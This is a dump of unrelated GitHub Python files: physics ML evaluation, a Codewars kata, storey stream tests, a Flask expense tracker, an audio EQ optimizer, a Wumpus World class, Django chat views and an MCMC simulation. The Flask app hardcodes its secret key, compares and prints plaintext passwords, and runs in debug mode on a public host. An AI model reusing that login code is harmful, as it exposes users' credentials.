bins=30, figsize=(10, 6), grid=True)\n# fig.figure.savefig('stack.png',dpi=600)\nimport postTrainingToolkit\ninput_tuple=( #first element of tuple = signal tree, second =bkg tree.\n [('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','POGTightWithTightIso_Central/Result_Tree','chk_reco_correct==1'),\n \n #('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/El/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','passTightID_Central/Result_Tree','chk_reco_correct==1')\n ], ##TTLJ_WtoCB Reco 1, (file_path, tree_path, filterstr)\n \n [\n ('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','POGTightWithTightIso_Central/Result_Tree','chk_reco_correct==0'), ##TTLJ_WtoCB Reco 0\n ('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_powheg.root','POGTightWithTightIso_Central/Result_Tree','decay_mode==43'),\n #('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/El/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','passTightID_Central/Result_Tree','chk_reco_correct==0'), ##TTLJ_WtoCB Reco 0\n #('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/El/RunResult/Central_Syst/Vcb_TTLJ_powheg.root','passTightID_Central/Result_Tree','decay_mode==43')\n ] ##TTLJ_WtoCB cs decay\n \n )\ndata = load_data(tree_path_filter_str=input_tuple,varlist=varlist,test_ratio=0.1,val_ratio=0.2)\narr = data['train_features']\nweights = data['train_weight']\ny=data['train_y']\npred = model.predict_proba(arr)[:,1]\npostTrainingToolkit.ROC_AUC(score=pred,y=y,weight=weights,plot_path=folder_path)\n\n\ntrain_score = model.predict_proba(data['train_features'])[:,1]\nval_score = model.predict_proba(data['val_features'])[:,1]\nkolS, kolB = postTrainingToolkit.KS_test(train_score,val_score,data['train_weight'],data['val_weight'],data['train_y'],data['val_y'],plotPath=folder_path)\nprint(f'{kolS}, {kolB}')\n\n\nres_explain, res_masks = model.explain(data['train_features'])\nnp.save(os.path.join(folder_path,'explain.npy'), res_explain)\nnp.save(os.path.join(folder_path,'mask.npy'),res_masks)\nnp.save(os.path.join(folder_path,'y.npy'),data['train_y'])\n#feature_importances_ = model._compute_feature_importances(data['train_features'])\n#print(feature_importances_)","repo_name":"kyj519/VcbMVAStudy","sub_path":"TabNet_Permutation/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5878780557","text":"class Portfolio():\n def __init__(self, stocks=[]):\n self.stocks = stocks\n\n def Profit(start, end):\n start_val 
= sum([x for x in stocks])\n return start_val\n\nclass Stock():\n def __init__(self, name, date, price):\n self.name = name\n self.date = date\n self.price = price\n\n def Price():\n return self.price\n\np = Portfolio()\n\n# Fake Stocks\ndef fake_stock():\n from random import randint, sample\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n name = \"\".join(sample(list(letters),randint(2,4)))\n price = randint(100,99999)/100\n return (name,price)\n\ndef fake_portfolio(n=10,start='20170101',end='20181231'):\n from datetime import date, datetime\n from workdays import workday\n import numpy as np\n from random import randint\n\n stocks = [fake_stock() for i in range (0, n)]\n dt = datetime.strptime(start, '%Y%m%d')\n result = dict()\n while dt <= datetime.strptime(end, '%Y%m%d'):\n price = [(value[0],round(list(np.random.normal(value[1],value[1]/randint(10,100),1))[0],2)) for key,value in enumerate(stocks)]\n dt = workday(dt,1)\n result[dt.strftime('%Y%m%d')] = price\n return result\n\nport = fake_portfolio()\nfor k,v in enumerate(port):\n print(v)","repo_name":"abracadani/fntl","sub_path":"fntl.py","file_name":"fntl.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12051563907","text":"'''\nSwap items in a dictionary (7 kyu)\nhttps://www.codewars.com/kata/5a21e090f28b824def00013c\n\nIn this kata, you will take the keys and values of a dict and swap them around.\nYou will be given a dictionary, and then you will want to return a dictionary with the old values as the keys, and list the old keys as values under their original keys.\n\nThe dictionary given will only contain strings.\nThe dictionary given will not be empty.\nYou do not have to sort the items in the lists.\n'''\n\ndef switch_dict(dic):\n switch = {}\n for k, v in dic.items():\n if v not in switch:\n switch[v] = [k]\n else:\n switch[v].append(k)\n return switch","repo_name":"zerqatu/codewars-katas","sub_path":"python/swap_items_in_dictionary.py","file_name":"swap_items_in_dictionary.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18492246881","text":"import base64\n\nfrom storey import Filter, JoinWithV3IOTable, JoinWithHttp, Map, Reduce, Source, NeedsV3ioAccess, HttpRequest, build_flow, WriteToV3IOStream\n\nimport aiohttp\nimport asyncio\nimport json\nimport time\n\n\nclass SetupKvTable(NeedsV3ioAccess):\n async def setup(self, table_path):\n connector = aiohttp.TCPConnector()\n client_session = aiohttp.ClientSession(connector=connector)\n for i in range(1, 10):\n request_body = json.dumps({'Item': {'secret': {'N': f'{10 - i}'}}})\n response = await client_session.request(\n 'PUT', f'{self._webapi_url}/{table_path}/{i}', headers=self._put_item_headers, data=request_body, ssl=False)\n assert response.status == 200, f'Bad response {await response.text()} to request {request_body}'\n\n\nclass SetupStream(NeedsV3ioAccess):\n async def setup(self, stream_path):\n connector = aiohttp.TCPConnector()\n client_session = aiohttp.ClientSession(connector=connector)\n request_body = json.dumps({\"ShardCount\": 2, \"RetentionPeriodHours\": 1})\n response = await client_session.request(\n 'POST', f'{self._webapi_url}/{stream_path}/', headers=self._create_stream_headers, data=request_body, ssl=False)\n assert response.status == 204, f'Bad response {await response.text()} to request {request_body}'\n\n\nclass GetShardData(NeedsV3ioAccess):\n 
async def get_shard_data(self, path):\n connector = aiohttp.TCPConnector()\n client_session = aiohttp.ClientSession(connector=connector)\n request_body = json.dumps({'Type': 'EARLIEST'})\n response = await client_session.request(\n 'PUT', f'{self._webapi_url}/{path}', headers=self._seek_headers, data=request_body, ssl=False)\n if response.status == 404:\n return []\n if response.status == 400: # Regression in 2.10\n body = await response.text()\n try:\n body_obj = json.loads(body)\n if body_obj['ErrorMessage'] == \"ResourceNotFoundException\":\n return []\n except:\n raise AssertionError(f'Got response status code 400: {body}')\n assert response.status == 200, await response.text()\n location = json.loads(await response.text())['Location']\n data = []\n while True:\n request_body = json.dumps({'Location': location})\n response = await client_session.request(\n 'PUT', f'{self._webapi_url}/{path}', headers=self._get_records_headers, data=request_body, ssl=False)\n assert response.status == 200, await response.text()\n response_dict = json.loads(await response.text())\n for record in response_dict['Records']:\n data.append(base64.b64decode(record['Data']))\n if response_dict['RecordsBehindLatest'] == 0:\n break\n location = response_dict['NextLocation']\n return data\n\n\ndef test_join_with_v3io_table():\n table_path = f'bigdata/test_join_with_v3io_table/{int(time.time_ns() / 1000)}'\n asyncio.run(SetupKvTable().setup(table_path))\n controller = build_flow([\n Source(),\n Map(lambda x: x + 1),\n Filter(lambda x: x < 8),\n JoinWithV3IOTable(lambda x: x.body, lambda x, y: y['secret'], table_path),\n Reduce(0, lambda x, y: x + y)\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n termination_result = controller.await_termination()\n assert termination_result == 42\n\n\ndef test_join_with_http():\n controller = build_flow([\n Source(),\n Map(lambda x: x + 1),\n Filter(lambda x: x < 8),\n JoinWithHttp(lambda _: HttpRequest('GET', 'https://google.com', ''), lambda _, response: response.status),\n Reduce(0, lambda x, y: x + y)\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n termination_result = controller.await_termination()\n assert termination_result == 200 * 7\n\n\ndef test_write_to_v3io_stream():\n stream_path = f'bigdata/test_write_to_v3io_stream/{int(time.time_ns() / 1000)}/'\n asyncio.run(SetupStream().setup(stream_path))\n controller = build_flow([\n Source(),\n Map(lambda x: str(x)),\n WriteToV3IOStream(stream_path, sharding_func=lambda event: int(event.body))\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n controller.await_termination()\n shard0_data = asyncio.run(GetShardData().get_shard_data(f'{stream_path}/0'))\n assert shard0_data == [b'0', b'2', b'4', b'6', b'8']\n shard1_data = asyncio.run(GetShardData().get_shard_data(f'{stream_path}/1'))\n assert shard1_data == [b'1', b'3', b'5', b'7', b'9']\n\n\ndef test_write_to_v3io_stream_unbalanced():\n stream_path = f'bigdata/test_write_to_v3io_stream/{int(time.time_ns() / 1000)}/'\n asyncio.run(SetupStream().setup(stream_path))\n controller = build_flow([\n Source(),\n Map(lambda x: str(x)),\n WriteToV3IOStream(stream_path, sharding_func=lambda event: 0)\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n controller.await_termination()\n shard0_data = asyncio.run(GetShardData().get_shard_data(f'{stream_path}/0'))\n assert shard0_data == [b'0', b'1', b'2', b'3', b'4', b'5', b'6', b'7', b'8', b'9']\n shard1_data 
= asyncio.run(GetShardData().get_shard_data(f'{stream_path}/1'))\n assert shard1_data == []\n","repo_name":"v3io/storey","sub_path":"integration/test_flow_integration.py","file_name":"test_flow_integration.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26435709359","text":"from click.testing import CliRunner\nfrom gcli import search\n\n\n# search(path, ftype):\n\n\ndef test_search():\n runner = CliRunner()\n result = runner.invoke(search, [\"--path\", \".\", \"--ftype\", \"py\"])\n assert result.exit_code == 0\n assert \".py\" in result.output\n","repo_name":"noahgift/python-devops-course","sub_path":"test_gcli.py","file_name":"test_gcli.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"31"} +{"seq_id":"14118059487","text":"from flask import Flask, jsonify, render_template, session, request, redirect, url_for, abort\nfrom datetime import datetime\nfrom db import *\n# import plotly.graph_objs as go\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'cd85d99372e02261cc7fb70ef9b1ddfc'\n\n# class User(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# username = db.Column(db.String(80), unique=True, nullable=False)\n# password = db.Column(db.String(120), nullable=False)\n\n# class Expense(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n# title = db.Column(db.String(100), nullable=False)\n# cost = db.Column(db.Float, nullable=False)\n# date = db.Column(db.Date, nullable=False)\n# category = db.Column(db.String(50), nullable=False)\n\n# class Budget(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# user_id = db.Column(db.Integer, nullable=False)\n# budget = db.Column(db.Float, nullable=False)\n# category = db.Column(db.String(80), nullable=False)\n# date = db.Column(db.Date, nullable=False)\n\n# experience_dict = {'Programming Language': ['Excel', 'Python', 'Tableau', 'R', 'Bash', 'Powershell'],\n# 'Years of Experience (As of April 2022)': [8,4,3,2,1,1]}\n# fig = px.bar(experience_dict, x='Programming Language',y='Years of Experience (As of April 2022)', color_discrete_sequence=['white'])\n# fig.update_layout (\n# paper_bgcolor' : \"rgba (0,0,0,0)\"\n# # plot_bgcolor : \"rgba (0,0,0,0)\"\n# font_color = 'white',\n# font_family = ' verdana\n# font_size = 20,\n# )\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n if check_user_exist(username):\n print(get_password(username))\n print(request.form['password'])\n if get_password(username) == request.form['password']:\n session['username'] = request.form['username']\n return redirect('/dashboard')\n else:\n return render_template('login.html', message='Invalid login credentials')\n else:\n return render_template('login.html', message='Invalid login credentials')\n return render_template('login.html')\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n username = request.form['username']\n if check_user_exist(username):\n return render_template('register.html', message='Username already exists')\n userpw = [username, request.form['password']]\n new_user(userpw)\n return redirect(url_for('login'))\n return 
render_template('register.html')\n\n@app.route(\"/logout\", methods=['GET', 'POST'])\ndef log_out():\n session.pop('username', None)\n return redirect('/')\n\n@app.route('/dashboard')\ndef dashboard():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n # return render_template('dashboard.html', username=username, data=data)\n return render_template('dashboard.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n\n@app.route('/logout')\ndef logout():\n session.pop('username', None)\n return redirect(url_for('login'))\n\n@app.route('/report_expense', methods=['POST'])\ndef report_expense():\n # Get the form data\n username = session['username']\n title = request.form.get('title')\n cost = request.form.get('cost')\n date_str = request.form.get('date')\n category = request.form.get('category')\n date = datetime.strptime(date_str, '%Y-%m-%d').date()\n data = [username, cost, title, category, date]\n import_expense(data)\n return redirect(url_for('expenses'))\n\n@app.route('/chart', methods=['POST', 'GET'])\ndef chart():\n x=['b', 'a', 'c', 'd']\n fig = go.Figure(go.Bar(x=x, y=[2,5,1,9], name='Montreal'))\n fig.add_trace(go.Bar(x=x, y=[1, 4, 9, 16], name='Ottawa'))\n fig.add_trace(go.Bar(x=x, y=[6, 8, 4.5, 8], name='Toronto'))\n fig.update_layout(barmode='stack', xaxis={'categoryorder':'total descending'})\n fig.show()\n\n # \n\n@app.route('/get_expenditures_by_category')\ndef get_expenditures_by_category():\n # Retrieve the user's expenditures by category data from the database\n # and organize it as a dictionary\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n expenditures = {}\n for row in data:\n print(f'row: {row}')\n if row[0] not in expenditures:\n expenditures[row[0]] = 0\n expenditures[row[0]] += row[1]\n \n\n return jsonify(expenditures)\n\n\n@app.route('/expenses')\ndef expenses():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n return render_template('expenses.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n \n@app.route('/budget')\ndef budget():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n return render_template('budget.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n \n\n@app.route('/about')\ndef about():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n return render_template('about.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n\nif __name__ == \"__main__\": # true if this file NOT imported\n app.debug = True # enable auto-reload upon code change\n app.run(host = '0.0.0.0', port=80)\n","repo_name":"erica1i/GerLik-KnotS","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25755171641","text":"import cvxpy as cp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport librosa.display\n\nfrom numpy.typing import ArrayLike\nfrom ... 
import eq\nfrom .optimizer import Optimizer\n\n\n# from ..config import Config\n\n\nclass EQ3Optimizer(Optimizer):\n def __init__(self, config):\n self.config = config\n c = config\n \n self.filter_low, self.filter_mid, self.filter_high = eq.eq3_filters(\n cutoff_low=c.cutoff_low,\n center_mid=c.center_mid,\n cutoff_high=c.cutoff_high,\n sr=c.sr,\n )\n \n if c.spec_type == 'cqt':\n self.bin_freqs = librosa.cqt_frequencies(n_bins=c.num_cqt_bins, fmin=c.fmin, bins_per_octave=12)\n elif c.spec_type == 'mel':\n self.bin_freqs = librosa.mel_frequencies(c.num_mel_bins, fmin=c.fmin, fmax=c.fmax)\n else:\n raise ValueError(f'Unknown spec_type: {c.spec_type}')\n \n self.bin_gains = dict(\n low=eq.bin_gains(self.filter_low, self.bin_freqs, c.sr),\n mid=eq.bin_gains(self.filter_mid, self.bin_freqs, c.sr),\n high=eq.bin_gains(self.filter_high, self.bin_freqs, c.sr),\n )\n \n self.bins = dict(\n low=self.bin_freqs <= c.cutoff_low,\n mid=(c.mid_opt_range[0] < self.bin_freqs) & (self.bin_freqs < c.mid_opt_range[1]),\n high=c.cutoff_high <= self.bin_freqs,\n )\n \n self.band_gains = dict(\n low=self.bin_gains['low'][self.bins['low']],\n mid=self.bin_gains['mid'][self.bins['mid']],\n high=self.bin_gains['high'][self.bins['high']],\n )\n \n self.data = {}\n self.results = {}\n self.prob = None\n \n def optimize(\n self,\n S_dj: ArrayLike,\n S_prev: ArrayLike,\n S_next: ArrayLike,\n verbose=True\n ):\n c = self.config\n \n self.data['S_dj'] = S_dj\n self.data['S_prev'] = S_prev\n self.data['S_next'] = S_next\n \n num_frames = S_dj.shape[1]\n \n data = self.data\n losses = {}\n constraints = []\n \n for band in ['low', 'mid', 'high']:\n beta_prev = cp.Variable(shape=num_frames, pos=True, name=f'beta_prev_{band}')\n beta_next = cp.Variable(shape=num_frames, pos=True, name=f'beta_next_{band}')\n \n constraints += [\n beta_prev <= 1,\n beta_next <= 1,\n cp.diff(beta_prev) <= 0,\n cp.diff(beta_next) >= 0,\n ]\n \n Sband_dj = S_dj[self.bins[band]]\n Sband_prev = S_prev[self.bins[band]]\n Sband_next = S_next[self.bins[band]]\n \n # Reshape variables for broadcasting.\n beta_prev_ = cp.reshape(beta_prev, shape=(1, num_frames))\n beta_next_ = cp.reshape(beta_next, shape=(1, num_frames))\n \n H_min = self.band_gains[band].reshape(-1, 1)\n # H_inv = 1 - H_min\n H_prev = beta_prev_ + cp.multiply(1 - beta_prev_, H_min)\n H_next = beta_next_ + cp.multiply(1 - beta_next_, H_min)\n Y_prev = cp.multiply(H_prev, Sband_prev)\n Y_next = cp.multiply(H_next, Sband_next)\n Y = Y_prev + Y_next\n Y_true = Sband_dj\n \n # Mean absolute error. 
MSE makes errors from small signals insignificant.\n loss = cp.sum(cp.abs(Y - Y_true)) / np.prod(Sband_dj.shape) / Sband_dj.mean()\n losses[band] = loss\n data[band] = dict(\n Y_prev=Y_prev,\n Y_next=Y_next,\n Y=Y,\n )\n \n loss = cp.sum(list(losses.values()))\n objective = cp.Minimize(loss)\n self.prob = cp.Problem(objective, constraints)\n self.prob.solve(solver='ECOS', verbose=verbose)\n \n for deck in ['prev', 'next']:\n for band, min_db in zip(\n ['low', 'mid', 'high'],\n [-80, -27, -80]\n ):\n beta = self.prob.var_dict[f'beta_{deck}_{band}'].value\n db_gain = 20 * np.log10(beta + librosa.db_to_amplitude(min_db))\n self.results[f'eq_{deck}_{band}'] = beta\n self.results[f'eq_{deck}_{band}_db'] = db_gain\n \n return self.results\n \n def plot(\n self,\n S_est_mix_db,\n S_est_prev_db,\n S_est_next_db,\n title=None,\n true_curves=None,\n S_prev=None,\n S_next=None,\n ):\n from matplotlib.patches import Patch\n \n S_prev = self.data['S_prev'] if S_prev is None else S_prev\n S_next = self.data['S_next'] if S_next is None else S_next\n \n linestyle = '--'\n linewidth_eq = 2\n cmap = 'magma'\n colors = dict(\n low='#00FFFF',\n mid='#FF00FF',\n high='#FFFF00',\n )\n c = self.config\n y_axis = 'cqt_hz' if c.spec_type == 'cqt' else 'mel'\n \n S_prev_db = librosa.amplitude_to_db(S_prev)\n S_next_db = librosa.amplitude_to_db(S_next)\n S_dj_db = librosa.amplitude_to_db(self.data['S_dj'])\n \n vmin = np.min([\n S_est_prev_db.min(), S_est_next_db.min(), S_est_mix_db.min(),\n S_prev_db.min(), S_next_db.min(), S_dj_db.min(),\n ])\n vmax = np.max([\n S_est_prev_db.max(), S_est_next_db.max(), S_est_mix_db.max(),\n S_prev_db.max(), S_next_db.max(), S_dj_db.max(),\n ])\n \n def plot_spec(S_db, ax):\n librosa.display.specshow(\n S_db,\n sr=c.sr, hop_length=c.hop,\n x_axis='frames', y_axis=y_axis,\n # x_axis='frames', y_axis='mel',\n fmin=c.fmin, fmax=c.fmax,\n bins_per_octave=c.cqt_bins_per_octave,\n cmap=cmap, ax=ax,\n # Let value-to-color mapping equal for all plots:\n vmin=vmin, vmax=vmax,\n )\n ax.set_xlabel(None)\n ax.set_xticks([])\n if c.spec_type == 'cqt':\n ax.set_yticks([2 ** i for i in range(6, 14)])\n \n def plot_curves(deck, ax):\n axeq = ax.twinx() # instantiate a second axes that shares the same x-axis\n for band in ['low', 'mid', 'high']:\n eq_db = self.results[f'eq_{deck}_{band}_db']\n axeq.plot(eq_db, color=colors[band], linestyle=linestyle, linewidth=linewidth_eq)\n \n if true_curves is not None:\n for band in ['low', 'mid', 'high']:\n true_eq_db = true_curves[f'eq_{deck}_{band}_db']\n axeq.plot(true_eq_db, color=colors[band], linestyle='-', linewidth=linewidth_eq)\n \n axeq.set_ylim(-85, 5)\n axeq.set_yticks(np.arange(-80, 1, 20))\n axeq.set_ylabel('Gain (dB)')\n \n def plot_name(name, ax):\n fig.text(\n 0.01, 0.45, name,\n transform=ax.transAxes, fontsize=18, color='white',\n bbox=dict(facecolor='black', alpha=0.5, edgecolor='black')\n )\n \n fig, axes = plt.subplots(6, 1, figsize=(16, 9))\n # Previous ---------------------------------------------------------\n # The original track:\n ax = axes[0]\n plot_spec(S_prev_db, ax)\n plot_name('Raw prev', ax)\n # Legends:\n patches = [\n Patch(color=color, label=name)\n for name, color in colors.items()\n ]\n ax.legend(loc='upper right', handles=patches)\n # The optimized track:\n ax = axes[1]\n plot_spec(S_est_prev_db, ax)\n plot_name('Estimated prev', ax)\n plot_curves('prev', ax)\n \n # Mix --------------------------------------------------------------\n # The DJ mix:\n ax = axes[2]\n plot_spec(S_dj_db, ax)\n plot_name('DJ mix', ax)\n # The 
optimized mix:\n ax = axes[3]\n plot_spec(S_est_mix_db, ax)\n plot_name('Estimated mix', ax)\n \n # Next -------------------------------------------------------------\n # The original track:\n ax = axes[4]\n plot_spec(S_next_db, ax)\n plot_name('Raw next', ax)\n # The optimized track:\n ax = axes[5]\n plot_spec(S_est_next_db, ax)\n plot_name('Estimated next', ax)\n plot_curves('next', ax)\n \n # X-axis\n tick_frames = np.arange(0, S_dj_db.shape[1], S_dj_db.shape[1] // 10)\n tick_times = librosa.frames_to_time(tick_frames, sr=c.sr, hop_length=c.hop).round().astype(int)\n tick_labels = [f'{sec // 60:02}:{sec % 60:02}' for sec in tick_times]\n ax.set_xticks(tick_frames)\n ax.set_xticklabels(tick_labels)\n ax.set_xlabel('Time')\n \n if title:\n fig.suptitle(title)\n fig.tight_layout()\n fig.subplots_adjust(wspace=0, hspace=0.05)\n \n return fig\n","repo_name":"mir-aidj/djmix-dataset","sub_path":"djmix/cvxopt/optimizers/eq3_optimizer.py","file_name":"eq3_optimizer.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"17461086573","text":"import utils\r\n\r\n\r\nclass WumpusWorld:\r\n \"\"\"Clase para representar al mundo del Wumpus, básicamente su cueva\"\"\"\r\n def __init__(self) -> None:\r\n self.__size = (4, 4)\r\n self.__rooms = utils.generate_moves_between_cells()\r\n # print(*[f\"{k}: {v}\" for k, v in self.__rooms.items()], sep='\\n')\r\n # Elementos del mapa\r\n self.__pits = []\r\n self.__gold = ()\r\n self.__monster = ()\r\n self.__explorer = 1, 1\r\n\r\n @property\r\n def width(self):\r\n return self.__size[0]\r\n\r\n @property\r\n def height(self):\r\n return self.__size[1]\r\n\r\n @property\r\n def rooms(self):\r\n return self.__rooms\r\n\r\n def populate(self):\r\n # Hardcodeado, porque sigue un ejemplo, en la práctica, debería ser generado\r\n # aleatoriamente\r\n self.__pits.append((3, 1))\r\n self.__pits.append((3, 3))\r\n self.__pits.append((4, 4))\r\n\r\n self.__gold = (2, 3)\r\n self.__monster = (1, 3)\r\n\r\n def set_explorer(self, location: tuple[int, int]):\r\n \"\"\"Ubica al explorador (agente) en el mapa\"\"\"\r\n self.__explorer = location\r\n\r\n def __str__(self) -> str:\r\n world = []\r\n for row in range(self.height, 0, -1):\r\n line = \"|\"\r\n for col in range(1, self.width + 1):\r\n if self.__explorer == (col, row):\r\n line += \" E \"\r\n elif self.__gold == (col, row):\r\n line += \" G \"\r\n elif self.__monster == (col, row):\r\n line += \" W \"\r\n elif (col, row) in self.__pits:\r\n line += \" P \"\r\n else:\r\n line += \" \"\r\n line += \"|\"\r\n world.append(line)\r\n return \"\\n\".join(world)\r\n\r\n # Consultas acerca del mundo\r\n def is_smelly(self, pos: tuple[int, int]):\r\n neighbors = self.__rooms[pos]\r\n return self.__monster in neighbors\r\n\r\n def is_breezy(self, pos: tuple[int, int]):\r\n neighbors = self.__rooms[pos]\r\n # Debe revisar si hay algún pozo a su alrededor\r\n for pit in self.__pits:\r\n if pit in neighbors:\r\n return True\r\n return False\r\n\r\n def is_wumpus(self, pos: tuple[int, int]):\r\n return self.__monster == pos\r\n\r\n def is_pit(self, pos: tuple[int, int]):\r\n for pit in self.__pits:\r\n if pit == pos:\r\n return True\r\n return False\r\n\r\n def is_shiny(self, pos: tuple[int, int]):\r\n return pos == self.__gold\r\n\r\n\r\n__all__ = [\"WumpusWorld\"]\r\n\r\nif __name__ == \"__main__\":\r\n w = WumpusWorld()\r\n w.populate()\r\n 
print(w)\r\n","repo_name":"jsalazarloyola/wumpus_kb","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5335271355","text":"from django.shortcuts import render\nfrom .models import ChatRoom, ChatMessage\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n@login_required\ndef rooms(request):\n\n all_rooms = ChatRoom.objects.all()\n\n context = {\n 'chat_rooms': all_rooms,\n }\n\n return render(request, 'chatrooms/rooms.html', context)\n\n@login_required\ndef chatroom(request, slug):\n\n room = ChatRoom.objects.get(slug=slug)\n\n messages = ChatMessage.objects.filter(room=room)[0:25]\n\n context = {\n 'chatroom': room,\n 'messages': messages,\n }\n\n return render(request, 'chatrooms/chatroom.html', context)","repo_name":"LoisaKitakaya/chat-app","sub_path":"chatrooms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70812934487","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 9 04:18:35 2020\n\n@author: lukepinkel\n\"\"\"\n\n\nimport arviz as az # analysis:ignore\nimport numpy as np # analysis:ignore\nimport scipy as sp # analysis:ignore\nimport scipy.stats # analysis:ignore\nimport pandas as pd # analysis:ignore\nfrom ..pylmm.glmm_mcmc import MixedMCMC # analysis:ignore\nfrom .tests.test_data_mcmc import construct_model_matrices, vine_corr, multi_rand # analysis:ignore\n\ndef to_arviz_dict(samples, var_dict, burnin=0):\n az_dict = {}\n for key, val in var_dict.items():\n az_dict[key] = samples[:, burnin:, val]\n return az_dict \n\nn_grp, n_per = 300, 30\nn_obs = n_grp * n_per\nformula = \"y~x+(1|id1)\"\nbeta = np.array([-0.1, 0.5])\ndf = pd.DataFrame(np.zeros((n_obs, 6)), columns=['x', 'id1', 'u', 'eta', 'mu', 'y'])\ndf['id1'] = np.repeat(np.arange(n_grp), n_per)\nr = np.sqrt(0.9)\n_, Z, _, _ = construct_model_matrices(formula, df)\nu = np.random.normal(0, 1, size=n_grp)\nu = (u - u.mean()) / u.std() * np.sqrt(2.0)\ndf['u'] = Z.dot(u)\ndf['x'] = sp.stats.norm(-df['u'], np.sqrt((1-0.7)/0.7*df['u'].var())).rvs()\nX, Z, _, _ = construct_model_matrices(formula, df)\nlp = X.dot(beta) + Z.dot(u)\nlpvar = lp.var()\nrsq = r**2\nnp.sqrt((1-rsq)/rsq*lpvar)\ndf['eta'] = sp.stats.norm(lp, np.sqrt((1-rsq)/rsq*lpvar)).rvs()\ndf['mu'] = np.exp(df['eta']) / (1 + np.exp(df['eta']))\ndf['y'] = sp.stats.binom(n=1, p=df['mu']).rvs()\n\n\n\nmodel = MixedMCMC(formula, df)\n\nn_samples, n_chains = 15_000, 8\nsamples = np.zeros((n_chains, n_samples, model.n_params))\nsamples_u = np.zeros((n_chains, n_samples, model.n_re))\nsamples_p = np.zeros((n_chains, n_samples, model.n_ob))\n\nmodel.t_init[-1] = 20\nfor i in range(n_chains):\n samples[i], scnd = model.sample_slice_gibbs(n_samples, save_pred=True, save_u=True)\n samples_p[i] = scnd['pred']\n samples_u[i] = scnd['u']\n \nsamples = samples[:, :, :-1]\naz_dict = to_arviz_dict(samples, {\"$\\\\beta$\":np.arange(2), \n \"$\\\\theta$\":np.arange(2, 3)}, burnin=1000)\n\naz_data = az.from_dict(az_dict)\nsummary = az.summary(az_data)\nsummary['sampling_effeciency'] = summary['ess_mean'] / np.product(samples.shape[:2])\nranef_summary = az.summary(samples_u)\n\n\nprint(summary)\naz.plot_trace(az_data, var_names=['$\\\\theta$'])\naz.plot_trace(az_data, var_names=['$\\\\beta$'])\n\n\nyhat_summary = 
